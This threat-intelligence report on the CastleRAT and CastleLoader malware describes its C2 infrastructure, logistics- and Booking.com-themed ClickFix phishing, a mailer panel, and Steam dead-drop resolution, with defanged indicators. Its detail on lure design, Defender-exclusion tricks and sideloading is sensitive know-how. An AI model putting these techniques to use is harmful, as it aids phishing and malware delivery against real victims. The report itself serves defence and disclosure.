        <p>CastleRAT is a remote access trojan (RAT) observed in both C and Python variants that share several core characteristics. Each variant communicates through a custom binary protocol secured with RC4 encryption and hard-coded sixteen-byte keys. Upon execution, CastleRAT queries a geolocation application programming interface (API) using <em>ip-api[.]com</em> to obtain victim geographic location and network details. Both variants support remote command execution, file download and execution, and establish an interactive remote shell. The C variant exhibits additional capabilities, including browser credential theft, keylogging, and screen capture functionality.</p>
        <h4>Infrastructure Analysis</h4>
        <p>Analysis of CastleRAT C-variant command-and-control (C2) infrastructure reveals notable operational overlap across multiple nodes sharing the RC4 key “NanuchkaUpyachka.” As illustrated in <strong>Figure 3</strong>, Insikt Group observed two CastleRAT C2 servers, <em>104[.]225[.]129[.]171</em> and <em>144[.]208[.]126[.]50</em>, maintain concurrent communications with at least three US-based victims, suggesting coordinated or redundant control channels. The overlapping traffic patterns, observed within the same daily collection windows, indicate that compromised hosts reached out to multiple C2s nearly simultaneously rather than migrating between them over time. This behavior implies a deliberate redundancy strategy employed by the threat actor. Additionally, direct communications between two CastleRAT C variants, <em>104[.]225[.]129[.]171</em> and <em>195[.]85[.]115[.]44</em>, further point to an interconnected infrastructure ecosystem rather than isolated C2 instances. Such internal connectivity could facilitate automated data synchronization, lateral control distribution, or key exchange mechanisms within the threat actor’s tooling, underscoring a more mature coordinated operational model than previously documented.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1d32a10bffa6e0b7534ef42d38aba5855ac9b6537.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="938" />
        </p>
        <p><em><strong>Figure 3</strong>: Victim communication with multiple CastleRAT C2 servers simultaneously (Source: Recorded Future)</em></p>
        <p>Notably, some CastleRAT samples <a href="https://tria.ge/250918-qj9pha1nz4/behavioral1">exhibit</a> behavior distinct from other observed variants by incorporating an elaborate handshake sequence and redundancy in their C2 communications. In these cases, the client’s initial request to the C2 server (for example, <em>77[.]238[.]241[.]203:443</em>) ends with the bytes <code>07 00 00 00</code> instead of the usual <code>01 00 00 00</code>, and the server responds with trailing bytes <code>9e ff 74 70</code> before closing the connection. A similar exchange occurs with <em>5[.]35[.]44[.]176</em>, after which the client reconnects to the first C2, transmitting only an encrypted sixteen-byte RC4 key and receiving trailing bytes <code>01 00 00 00</code> in response. The client then repeats this process with the second C2, sending <code>01 00 00 00</code> and receiving only the encrypted sixteen-byte RC4 key in return. This pattern suggests the use of additional handshake stages and dual-C2 redundancy mechanisms not seen in all CastleRAT samples.</p>
        <h4>Clustering by RC4 Key</h4>
        <p>Analysis of CastleRAT infrastructure identified multiple clusters of IP addresses grouped by hard-coded RC4 encryption keys (see <strong>Figure 4</strong>). While each RC4 key forms a distinct cluster, all clusters exhibit some degree of overlap through shared keys, suggesting a deliberate or coordinated relationship rather than a coincidental overlap. This interconnected structure suggests a shared tooling or deployment framework underpinning both CastleRAT and CastleLoader operations. Although this does not conclusively establish single-threat actor control, the degree overlap implies a common developer or operator ecosystem rather than independent, uncoordinated usage of the malware.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1be5107977c3267366984e116b333887daf9703ac.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1390" /><em><strong>Figure 4:</strong></em> <em>RC4 key clusters (Source: Recorded Future)</em>
        </p>
        <h3>CastleLoader</h3>
        <h4>Infrastructure Analysis</h4>
        <p>Insikt Group identified additional C2 infrastructure associated with CastleLoader. The related domains and IP addresses are listed in <strong>Appendix A</strong>. Notably, several domains share the same WHOIS start of authority (SOA) email address, indicating they were likely registered by the same threat actor.</p>
        <p>Notably, the domain <em>oldspicenotsogood[.]shop</em> is linked to several other domains listed in <strong>Appendix B</strong>, which are likely used for malicious activity, including impersonation of legitimate brands such as DocuSign, Norton, and TradingView. Additionally, at least one of these domains, <em>testdomain123123[.]shop</em>, has been identified as a LummaC2 C2 server.</p>
        <h3>Activity Clusters</h3>
        <p>Insikt Group identified four distinct clusters of activity associated with the deployment of CastleLoader (see <strong>Figure 4</strong>). The first cluster, tracked as TAG-160, appears to be highly targeted toward the logistics sector, employing techniques specifically tailored to this industry. In contrast, the second cluster, tracked as TAG-161, exhibits a broader targeting scope and leverages Booking.com-themed lures. The third cluster likewise impersonates Booking.com but shows no overlap with TAG-161. The fourth cluster relies on malvertising campaigns and fake software update mechanisms.</p>
        <p>Based on Insikt Group’s assessment, these clusters are associated with distinct users deploying CastleLoader, as no overlap in infrastructure or tactics was observed between them. At this stage, the exact nature of the relationship between these users and GrayBravo (formerly tracked as TAG-150) remains unclear. Insikt Group further assesses that additional CastleLoader users are likely active, supported by proprietary Recorded Future intelligence and the large number of identified panels, which collectively suggest a broader user base.</p>
        <h4>Cluster 1: Logistics Sector-Focused Activity Tracked as TAG-160</h4>
        <p>Cluster 1, tracked as TAG-160, has been active since at least March 2025 and remains operational at the time of analysis. TAG-160 employs infrastructure that impersonates logistics companies and leverages logistics-themed phishing lures, among other tactics. It uses ClickFix techniques to deliver CastleLoader, among additional payloads. Evidence suggests the cluster operates a mix of threat actor-controlled and -compromised infrastructure. Additionally, it has been observed exploiting vulnerabilities in target organizations’ systems, such as spoofing legitimate email senders from logistics companies to enhance the credibility of its phishing campaigns. In addition, Cluster 1 uses access to the legitimate freight-matching platforms DAT Freight &amp; Analytics and Loadlink Technologies for multiple purposes.</p>
        <h5>Attack Flow</h5>
        <p>Cluster 1 employs spearphishing campaigns in combination with ClickFix techniques to compromise victims. <strong>Figure 5</strong> illustrates a high-level overview of the phishing attack flow.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1a3fbdc837ac260e056768d86ba670ab247081c07.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="723" />
        </p>
        <p><em><strong>Figure 5</strong>: ClickFix attack flow used by TAG-160 (Source: Recorded Future)</em></p>
        <p>The attack chain typically begins with either a spoofed legitimate email address (for example, <em>no-reply[@]englandlogistics[.]com</em>) or a threat actor-controlled address associated with a typosquatted domain (for example, <em>englandloglstics[.]com</em>), impersonating companies such as England Logistics. Historically, such emails have been sent to US-based carriers, presenting fraudulent freight quotes that appear to originate from England Logistics. However, other organizations likely to be influenced by logistics-themed lures cannot be ruled out as potential targets.</p>
        <p>The emails prompt recipients to click a link to view a supposed rate confirmation for a shipment, instructing them to copy and paste the link into a browser if it does not open directly. The threat actors often add a sense of urgency, warning that the link will soon expire. Clicking the link leads victims to a landing page designed to harvest information (see <strong>Figure 6</strong>). Insikt Group has <a href="https://www.urlquery.net/report/99d39dd3-bfd6-44fa-9275-e7d7e7a22ac9">observed</a> multiple variations of these landing pages.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_155561bfb43adf9b6751ba6800e35c480f96c98ed.png?width=750&amp;format=png&amp;optimize=medium" width="966" height="1052" />
        </p>
        <p><em><strong>Figure 6</strong>: “dpeforms” lure used by TAG-160 (Source: Recorded Future)</em></p>
        <p>Notably, although Insikt Group was unable to retrieve the landing page associated with another Cluster 1–linked domain, <em>loadstracking[.]com</em>, indexed Google search results indicate that the domain likely hosted the same or a similar page as observed in <strong>Figure 7</strong>. DPE likely stands for “Direct Port Entry,” which is a system designed for exporters, allowing goods to be directly moved from their premises to the port and loaded onto the vessel for export without being transferred to a container freight station.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1a43f26ffef45a6c789ad537c5e1232e719f5353f.png?width=750&amp;format=png&amp;optimize=medium" width="743" height="147" />
        </p>
        <p><em><strong>Figure 7</strong>: “dpeforms” page found in Google Search (Source: Recorded Future)</em></p>
        <p>After submitting their information, the victim is presented with ClickFix-style instructions, guiding them through a series of steps purportedly required to complete a document signing process (see <strong>Figure 8</strong>). By incorporating the DocuSign logo, the threat actors likely aim to enhance the perceived legitimacy of the page and further deceive the victim.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1a29b8734977ac6a714e89ce057ad87cfbcb12c81.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="633" />
        </p>
        <p><em><strong>Figure 8</strong>: DocuSign-themed ClickFix used by TAG-160 (Source: Recorded Future)</em></p>
        <p>By following the instructions shown in <strong>Figure 8</strong>, the victim unknowingly executes the command illustrated in <strong>Figure 9</strong>. This command runs silently in the background, downloads and extracts a payload archive from a remote IP address, executes a Python-based malware using <code>pythonw.exe</code>, and displays a decoy message to appear legitimate. Observed payloads delivered through this method include CastleLoader, HijackLoader, Rhadamanthys, and zgRAT.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_194d883d95935fed30bcd62de8a8aa760b4f8dd9d.png?width=750&amp;format=png&amp;optimize=medium" width="1262" height="206" />
        </p>
        <p><em><strong>Figure 9</strong>: ClickFix command (Source: Recorded Future)</em></p>
        <h5>Use of Compromised Infrastructure</h5>
        <p>As part of TAG-160’s phishing infrastructure, the threat actors appear to rely not only on spoofed email addresses, as previously described, but also on compromised systems. Insikt Group has observed indications that the threat actors likely leveraged compromised infrastructure to send phishing emails. For example, at least one domain used to distribute phishing messages contained malware logs from infostealers such as LummaC2, including stolen credentials for a Namecheap account.</p>
        <h5>Infrastructure Analysis</h5>
        <p>Insikt Group identified a large number of domains and IP addresses associated with Cluster 1, all of which either impersonate logistics companies or align with logistics-themed phishing lures (see <strong>Appendix C</strong>). Notably, the majority of these domains include the subdomain <em>apps[.]englandlogistics</em> (for example, <em>apps[.]englandlogistics[.]rateconfirmations[.]com</em>), suggesting they were likely designed to impersonate England Logistics, as outlined in the previous section. One domain, <em>loadstrucking[.]com</em>, instead featured the subdomain <em>app[.]england</em>, following a similar naming pattern.</p>
        <p>Insikt Group <a href="https://urlscan.io/result/0197f23f-1845-74dd-90af-539a30c3aa3e">identified</a> the subdomain <em>files[.]loadstracking[.]com</em>, hosted on the IP address <em>89[.]185[.]84[.]211</em> between July 6 and September 26, 2025, which was serving the file <code>newtag.zip</code> (SHA256: d87ccd5a2911e46a1efbc0ef0cfe095f136de98df055eacd1c82de76ae6fecec). The ZIP folder contained a legitimate WinGup executable for Notepad++ that sideloaded a malicious libcurl.dll identified as DonutLoader. This loader subsequently retrieved three intermediate payloads from the legitimate subdomain <em>files-accl[.]zohoexternal[.]com</em>.</p>
        <h5>Domain Re-Registration Tactic</h5>
        <p>Similarly, Insikt Group assesses that to further enhance the perceived legitimacy of their infrastructure, the threat actor deliberately re-registered domains previously associated with legitimate logistics companies, in addition to using typosquatted domains. <strong>Figure 10</strong> provides two examples of this activity.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1767d51180ebfc148db82f1ef427279295a0b4538.png?width=750&amp;format=png&amp;optimize=medium" width="1082" height="206" />
            </div>
          </div>
        </div>
        <p><em><strong>Figure 10</strong>: Re-registration of logistics-themed domains (Source: Recorded Future)</em></p>
        <p>Notably, the domain <em>cdlfreightlogistics[.]com</em> appears to have previously hosted a website associated with the legitimate company CDL Freight Logistics, Inc. in 2023. Similarly, the domain <em>hometownlogisticsllc[.]com</em> hosted a website for Hometown Logistics LLC in 2021 (see <strong>Figure 11</strong>).</p>
        <div></div>
        <p><em><strong>Figure 11</strong>: Registration of domains previously owned by legitimate logistics companies (Source: Recorded Future)</em></p>
        <h5>Public Complaints and Suspected Access to DAT and Loadlink</h5>
        <p>Some of the domains listed in the <strong>Infrastructure Analysis</strong> section have been publicly referenced in connection with suspicious or fraudulent activity. For example, the email address <em>david[@]cdlfreightlogistics[.]com</em>, associated with the domain <em>cdlfreightlogistics[.]com</em>, first appeared on August 26, 2025, in a public Telegram channel named “current_hot_loads”, a forum used by individuals and companies in the logistics industry to share information such as market rates. In that instance, a user asked other members whether an email was legitimate (see <strong>Figure 12</strong>). Several respondents indicated they did not believe it to be legitimate.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1416daca3dfc49f61ff3c646109de20af7819dbea.png?width=750&amp;format=png&amp;optimize=medium" width="800" height="413" />
        </p>
        <p><em><strong>Figure 12:</strong></em> <em>Example phishing email sent by TAG-160 (Source: Recorded Future)</em></p>
        <p>While Insikt Group was unable to obtain additional details about the email exchange linked to the email posted in the channel, the available text suggests that the threat actor initially contacted potential victims without including malicious content, likely aiming to establish rapport before sending follow-up messages containing malicious links.</p>
        <p>In another instance, Insikt Group identified a post from an employee of a legitimate logistics company based in Rhode Island, USA, describing an incident in which a threat actor created accounts impersonating their company on DAT Freight &amp; Analytics (<em>dat.com</em>) and Loadlink Technologies (<em>loadlink.ca</em>), both platforms operating in the freight matching industry (see <strong>Figure 13</strong>). The fraudulent registrations used fake company information, including the email address <em>paul[@]mrlogsol[.]ca</em>, which is associated with Cluster 1–linked infrastructure. Notably, in line with Cluster 1’s typical patterns, the email addresses used in these operations often consist of only a first name (for example, Paul). The employee reported having contacted both DAT and Loadlink to alert them to the fraudulent activity.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_197d2097858ae7d6502840ec86c8d25d764e75569.png?width=750&amp;format=png&amp;optimize=medium" width="890" height="788" />
        </p>
        <p><em><strong>Figure 13</strong>: Complaint on Facebook written by an individual targeted by TAG-160 (Source: Recorded Future)</em></p>
        <p>Based on a confirmation email from one of the platforms’ abuse reporting teams, which the employee shared on Facebook as well, it appears that the threat actor was also using a Gmail address impersonating their company, <em>maritza[.]rmlogisticsol[@]gmail[.]com</em> (see <strong>Figure 14</strong>).</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_101b71323b17bacddaaeb2ba1f64855fb611f5936.png?width=750&amp;format=png&amp;optimize=medium" width="1128" height="988" />
        </p>
        <p><em><strong>Figure 14</strong>: Email shared by an individual targeted by TAG-160 (Source: Recorded Future)</em></p>
        <p>Threat actors associated with Cluster 1 appear to have access to fraudulent DAT and Loadlink accounts, as evidenced by a user report of fraudulent activity on Facebook (see <strong>Figure 13</strong>) and further supported by additional profiles identified by Insikt Group (see <strong>Figure 15</strong>). Furthermore, Insikt Group assesses that the threat actors may also have access to compromised legitimate accounts, given the substantial volume of stolen credentials associated with the domains <em>dat[.]com</em> and <em>loadlink[.]ca</em> observed in Recorded Future Identity Intelligence.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1eb360521afb816016f9bf42b54a29065e55cd924.png?width=750&amp;format=png&amp;optimize=medium" width="1280" height="445" />
        </p>
        <p><em><strong>Figure 15</strong>: Account information linked to TAG-160 (Source: Recorded Future)</em></p>
        <p>Access to platforms like DAT Freight &amp; Analytics and Loadlink Technologies not only enables the threat actors to enhance the appearance of legitimacy, allowing them to maintain plausible profiles should potential victims attempt verification, but also provides opportunities to gather contact information for prospective targets and obtain additional contextual data, such as details on specific loads, dates and times, documents, or related materials, which can then be repurposed as spearphishing lures. In addition, although not verified in this specific case, the threat actors may also post fraudulent load listings containing malicious content, potentially resulting in malware infections.</p>
        <h5>Possible Overlap with September 2024 Campaign</h5>
        <p>In September 2024, Proofpoint <a href="https://www.proofpoint.com/us/blog/threat-insight/security-brief-actor-uses-compromised-accounts-customized-social-engineering">reported</a> on an unattributed activity cluster observed since at least May 2024. The threat actors targeted transportation and logistics companies in North America to distribute various malware families, including LummaC2, StealC, and NetSupport RAT, as well as remote monitoring and management (RMM) tools such as SimpleHelp, PDQ Connect, Fleetdeck, and ScreenConnect. The campaigns employed several techniques: The threat actors compromised legitimate email accounts belonging to transportation and shipping companies, injecting malicious content into existing email threads to enhance credibility. They also used compromised accounts on DAT Freight &amp; Analytics and Loadlink platforms to post fraudulent load listings containing malicious URLs leading to RMM downloads. Lastly, they launched broader phishing waves that directed recipients to staging web pages hosting RMM installers. Most campaigns involved Google Drive URLs or attached .URL shortcut files that, when executed, used SMB to retrieve an executable from a remote share, leading to malware installation.</p>
        <p>While Insikt Group has not identified direct technical overlaps (for example, shared infrastructure), the similar targeting and partially overlapping tactics, particularly the use of DAT Freight &amp; Analytics and Loadlink, suggest a possible connection between this activity cluster and Cluster 1 (this is a low-confidence assessment).</p>
        <p>Notably, in November 2025, Proofpoint <a href="https://www.proofpoint.com/us/blog/threat-insight/remote-access-real-cargo-cybercriminals-targeting-trucking-and-logistics">reported</a> again on a possibly related activity where cybercriminals targeted trucking and logistics companies using RMM tools to hijack shipments. The attackers lured victims through fake load postings or compromised email threads, delivering malware or RMM software to gain access. This campaign highlights the growing convergence of cyber and physical cargo theft as criminals exploit digital logistics systems.</p>
        <h4>Cluster 2: Matanbuchus and Mailer Tool Activity Tracked as TAG-161</h4>
        <p>Cluster 2, tracked as TAG-161, has been active since at least June 2025 and remains operational at the time of analysis. The cluster leverages infrastructure impersonating Booking.com and employs ClickFix techniques. It primarily delivers CastleLoader and other payloads, including Matanbuchus. Notably, Insikt Group observed this cluster using Matanbuchus. Evidence indicates that the cluster relies mainly on threat actor-controlled infrastructure. Furthermore, Insikt Group identified a previously unreported phishing email management tooling, which appears to be used by threat actors linked to Cluster 2.</p>
        <h5>Matanbuchus Activity and Booking.com-Themed Infrastructure</h5>
        <p>Alongside CastleLoader, several Matanbuchus samples were distributed through Booking.com-themed ClickFix campaigns associated with Cluster 2. Notably, Insikt Group had previously reported Matanbuchus activity linked to CastleRAT in an earlier publication, where the Matanbuchus C2 panel was hosted on the adjacent IP address, <em>185[.]39[.]19[.]164</em> (see <strong>Figure 16</strong>).</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1fee0f400f126652867b44778e0424c29d3f6aac1.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" />
        </p>
        <p><em><strong>Figure 16</strong>: Matanbuchus panel on</em> 185[.]39[.]19[.]164 <em>(Source: Recorded Future)</em></p>
        <p>Matanbuchus is a C-based downloader MaaS available since 2021. One of its primary objectives is secrecy, which is in part fostered by limiting sales to a select number of customers. Currently at version three, it is continually maintained and improved by its creator BelialDemon. <a href="https://app.recordedfuture.com/portal/intelligence-card/edxAL9/overview?organization=uhash:5cJsHMHeSM">BelialDemon</a> offers Matanbuchus 3.0 as a monthly rental service with two pricing tiers based on the communication protocol: $10,000 per month for the <a href="https://app.recordedfuture.com/portal/intelligence-card/0SsNc/overview?organization=uhash:5cJsHMHeSM"></a><a href="https://app.recordedfuture.com/portal/intelligence-card/0SsNc/overview?organization=uhash:5cJsHMHeSM">HTTPS</a>-based version and $15,000 per month for the DNS-based version.</p>
        <p>Recorded Future Malware Intelligence’s most recent Matanbuchus sample at the time of writing <a href="https://tria.ge/251009-y1lyrsyzcx/behavioral1">communicated</a> with its C2 server at <em>mechiraz[.]com</em>, a domain behind Cloudflare but linked to the IP address <em>5[.]178[.]1[.]8</em> (TRIBEKA-AS, PA; AS211059). This IP address was also associated with the domain <em>nicewk[.]com</em>, previously <a href="https://www.morphisec.com/blog/ransomware-threat-matanbuchus-3-0-maas-levels-up/">reported</a> by Morphisec. Historical analysis of the same IP revealed several additional Matanbuchus C2 domains, including <em>galaxioflow[.]com</em> and <em>nimbusvaults[.]com</em>.</p>
        <h5>Additional Booking.com-Themed Infrastructure</h5>
        <p>By analyzing the same /24 CIDR range that hosted the Matanbuchus infrastructure during the period of observed activity, Insikt Group identified additional IP addresses and domains linked to Booking.com-themed ClickFix operations. These network indicators, detailed in <strong>Appendix D</strong>, are tracked by Insikt Group as part of Cluster 2.</p>
        <h5>Phishing Email Management Tooling</h5>
        <p>By analyzing the IP addresses hosting the domains listed in <strong>Appendix D</strong>, Insikt Group identified three that stood out for each hosting three previously unreported websites or management panels operating on high ports. The panels featured the following HTML titles: “Менеджер Email”, “Менеджер Редиректов и рассылок”, and “Менеджер Редиректов и Email” (translated as “Redirect and Email Manager”). Based on their visual appearance, technical implementation, and thematic focus, Insikt Group assesses that these websites are used in tandem as part of campaigns specifically targeting Booking.com.</p>
        <h5>Website 1: Redirect and Email Manager (“Менеджер Редиректов и Email”)</h5>
        <p>The first website, <a href="https://urlscan.io/result/0199c9ff-8739-76c3-b84e-a6c997c2e901">hosted</a> on port 56723, serves as a web-based interface for managing bulk redirections and email campaigns (see <strong>Figure 17</strong>). It integrates redirect generation, SMTP configuration, and email distribution capabilities within a single dashboard. The design, terminology, and functionality closely align with those typically observed in malspam or phishing infrastructure management panels.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_136c896a9d13593c36ce2ff3aa14bf18009f7b8df.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" /><em><strong>Figure 17</strong>: Page linked to “Redirect and Email Manager” tool (Source: Recorded Future)</em>
        </p>
        <p>Within the document object model (DOM) of the website, Insikt Group identified two email addresses, with one of them being likely a compromised account used to send phishing emails. At the time of discovery, the rambler email address, likely a burner account, appeared within the page’s SMTP configuration with associated credentials, indicating its use as the primary sender account for automated bulk email delivery, consistent with the panel’s design for coordinated phishing or spam distribution. The DOM also contained an AWS access key.</p>
        <p>Additionally, the DOM referenced a set of domains, some of which are listed in <strong>Appendix D</strong>, while others were newly identified and are listed in <strong>Appendix E</strong>. By searching for the phrase “Сервис редиректов работает для [domain]” (translated as “The redirect service works for [domain]”), Insikt Group discovered further related domains, likewise shown in <strong>Appendix E</strong>.</p>
        <h5>Website 2: Email Manager (“Менеджер Email”)</h5>
        <p>The second website, <a href="https://urlscan.io/result/0199c9ff-89fc-7485-9c2c-d9124361dc00">hosted</a> on port 56724, closely resembles the first “Redirect and Mailing Manager” panel but exhibits several notable configuration differences (see <strong>Figure 18</strong>). These include a distinct AWS username, an SMTP sender address, <em>bred[@]booking-porta[.]com</em>, as well as different logging settings and a few additional indicators of compromise. Furthermore, the website specified <em>109[.]104[.]153[.]87</em> as its proxy server.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1dd3b5b946434f96299c400d804be3d2845722bc0.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" /><em><strong>Figure 18</strong>: Page linked to “Email Manager” tool (Source: Recorded Future)</em>
        </p>
        <h5>Website 3: Booking-Mailer V2.2 (“Менеджер Редиректов и рассылок”)</h5>
        <p>The third website, <a href="https://urlscan.io/result/0199c9ff-8cbc-7029-b6ab-dfcc24a26c96">hosted</a> on port 56725, features a substantially larger DOM and functions as a combined redirect generator and mass-mailing platform (see <strong>Figure 19</strong>). The user interface exposes key capabilities, including domain selection, subdomain base-name configuration, HTML email templating (supporting URL placeholders for generated redirects), target file uploads, worker/thread management, SMTP pool configuration and validation, proxy editing, and real-time logging and statistics. Redirects are constructed using a domain and base name to generate unique subdomain links following the format: <code>[identifier].[base_name].[main_domain]</code>.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1a869a94ae293e8228df02d97b7bb9de354345613.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" /><em><strong>Figure 19</strong>: Page linked to “Booking-Mailer V2.2” tool (Source: Recorded Future)</em>
        </p>
        <p>The domains <em>site-riko[.]com</em>, <em>site-sero[.]com</em>, <em>site-silo[.]com</em>, <em>site-tiko[.]com</em>, and <em>site-filo[.]com</em> are all referenced within the DOM.</p>
        <p>Notably, within the “debug logs” in the DOM of the website, Insikt Group found a range of proxy servers with varying high ports. The IP addresses are listed in <strong>Table 1</strong>.</p>
        <div>
          <div>
            <div><strong>IP Address</strong></div>
            <div><strong>Ports</strong></div>
          </div>
          <div>
            <div>109[.]104[.]153[.]100</div>
            <div>11599, 12305, 13267, 13275</div>
          </div>
          <div>
            <div>109[.]104[.]153[.]193</div>
            <div>10324, 10616, 14195, 14196</div>
          </div>
          <div>
            <div>109[.]104[.]153[.]29</div>
            <div>13413, 14900</div>
          </div>
          <div>
            <div>109[.]104[.]154[.]67</div>
            <div>11264, 11860, 14100, 14122</div>
          </div>
        </div>
        <p><em><strong>Table 1</strong>: Proxy IP addresses found in DOM of “Booking-Mailer V2.2” tool (Source: Recorded Future)</em></p>
        <p>Insikt Group identified additional instances of the Phishing Email Management Tooling, all hosted on IP addresses announced by the same set of Autonomous Systems (ASes). The identified IP addresses are listed in <strong>Table 2</strong>. The domains hosted on these IP addresses are listed in <strong>Appendix H</strong>.</p>
        <div>
          <div>
            <div><strong>IP Address</strong></div>
            <div><strong>ASN</strong></div>
            <div><strong>Notes</strong></div>
          </div>
          <div>
            <div>85[.]208[.]84[.]65</div>
            <div>STIMUL-AS, RU (AS211659)</div>
            <div>
              <ul>
                <li>Certificate subject common name: <em>guesitastayhotel[.]com</em></li>
                <li>CastleRAT and Matanbuchus C2 servers identified within the same /24 range (<em>85[.]208[.]84[.]115</em> and <em>85[.]208[.]84[.]242</em>, respectively)</li>
              </ul>
            </div>
          </div>
          <div>
            <div>80[.]64[.]18[.]245</div>
            <div>STIMUL-AS, RU (AS211659)</div>
            <div>
              <ul>
                <li>Hosts hotel-themed domains</li>
              </ul>
            </div>
          </div>
          <div>
            <div>185[.]39[.]19[.]94</div>
            <div>OPTIMA-AS, RU (AS216341)</div>
            <div>
              <ul>
                <li>Certificate subject common name: <em>guesitastayhotel[.]com</em></li>
              </ul>
            </div>
          </div>
          <div>
            <div>88[.]214[.]50[.]83</div>
            <div>OPTIMA-AS, RU (AS216341)</div>
            <div>
              <ul>
                <li>Suspected testing server due to the number of domains including the keywords “test” and “demo”</li>
              </ul>
            </div>
          </div>
        </div>
        <p><em><strong>Table 2</strong>: Additional infrastructure instances of the Phishing Email Management Tooling (Source: Recorded Future)</em></p>
        <h5>ASN Cluster Possibly Linked to Bearhost</h5>
        <p>Insikt Group observed significant infrastructure activity associated with AS216341 (STIMUL-AS) and AS216341 (OPTIMA-AS) throughout this research. Both ASes were established on March 11, 2025, and have demonstrated consistent malicious activity since their inception. According to researchers at DeepCode, these providers <a href="https://decodecybercrime.com/bearhost-bulletproof-hosting-network-same-playbook-new-fronts/">maintain</a> strong links to the BEARHOST bulletproof hosting network, a known enabler of malicious cyber operations. BEARHOST and associated providers have reportedly serviced ransomware operations, including LockBit, Conti, MedusaLocker, as well as sanctioned entities such as Garantex, Lazarus Group, Zservers, and Nobitex. That same research further identified malicious activity and customer bases linked to both AS211659 and AS216341, consistent with Insikt Group’s own observations of Lumma, Rhadamanthys, and Matanbuchus within these autonomous systems. This overlap in observed threats reinforces the assessment that both autonomous systems are part of a broader BEARHOST-aligned infrastructure ecosystem supporting financially motivated cyber operations.</p>
        <h5>Infrastructure Similarities with TAG-157 (RefBroker)</h5>
        <p>Insikt Group has previously reported on threat actors impersonating Booking.com, including TAG-157, also known as RefBroker. Notably, domains associated with TAG-157 have been observed hosted on IP address <em>77[.]83[.]207[.]56</em>, adjacent to <em>77[.]83[.]207[.]55</em>, with the latter being part of TAG-161’s infrastructure. More broadly, both TAG-157 and TAG-161 appear to favor the same set of ASNs discussed in the section <strong>ASN Cluster Possibly Linked to Bearhost</strong>. At present, however, the exact relationship between TAG-157 and TAG-161 remains unclear.</p>
        <h4>Cluster 3: Booking.com Impersonation Activity</h4>
        <p>Cluster 3 has been active since at least March 2025 and remains operational at the time of analysis. The cluster leverages infrastructure impersonating Booking.com, ClickFix techniques, and uses Steam Community pages as a dead drop resolver to deliver CastleRAT via CastleLoader. Although the techniques appear similar to those described in Cluster 2, Insikt Group has not identified any technical overlaps between Clusters 2 and 3 at this time.</p>
        <h5>Infrastructure Analysis</h5>
        <p>Insikt Group noted a CastleRAT <a href="https://tria.ge/250818-vhng4awks9/behavioral2">sample</a> that leveraged a Booking.com phishing domain, <em>update-info4468765[.]com</em> (see <strong>Figure 20</strong>)<em>.</em> The phishing domain tricks users into running a malicious PowerShell command (via ClickFix techniques) that downloads a second-stage script from <em>boiksal[.]com/upd</em>. This script retrieves and executes a .NET loader that repeatedly spawns new PowerShell processes to add Windows Defender exclusions for the eventual payload (<code>update.exe</code>) using a User Account Control (UAC) prompt flooding loop to bypass analysis sandboxes and security controls. Once exclusions are applied, the loader decrypts and launches the CastleLoader payload, which then reaches out to its C2 domain, <em>programsbookss[.]com</em>, resolved through a Steam Community profile. The use of Steam Community profiles allows attackers to update infrastructure dynamically without redeploying malware (see <strong>Figure 21</strong>). CastleRAT samples that use Steam for deaddrops may sometimes contain a hard-coded backup C2 in the event the deaddrop C2 retrieval fails. A list of all observed Steam Community profiles and the various C2 domains observed on each is found in <strong>Appendix F.</strong></p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_11fc64af5fa19c4f74249b006eab3899fe29a0281.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1493" />
        </p>
        <p><em><strong>Figure 20</strong>: GrayBravo’s CastleRAT using Steam Community for dead drop resolving (Source: Steam)</em></p>
        <p>At the time of analysis, <em>update-info4468765[.]com</em> and <em>boiksal[.]com</em> were both hosted on <em>178[.]17[.]57[.]103</em>, while the Steam-resolved C2 domain, <em>programsbookss[.]com</em>, was hosted on an adjacent IP, <em>178[.]17[.]57[.]102</em>. This close placement within the same /24 subnet suggests that the operators likely acquired these IP addresses around the same time. It also suggests that they were assigned sequentially by the hosting provider, Global Connectivity Solutions (AS215540). A similar pattern was later observed across the <em>192[.]109[.]138[.]0/24</em> range, where Booking.com-themed phishing domains were hosted on <em>192[.]109[.]138[.]103</em> and the Steam-resolved C2 domains, <em>programsbookss[.]com</em> and <em>justnewdmain[.]com</em>, were hosted on <em>192[.]109[.]138[.]102</em>.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1b8336b05390165b9d107f8417922fed7d97dacc5.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1015" />
        </p>
        <p><em><strong>Figure 21</strong>: Booking.com-themed ClickFix linked to Cluster 3 (Source: Recorded Future)</em></p>
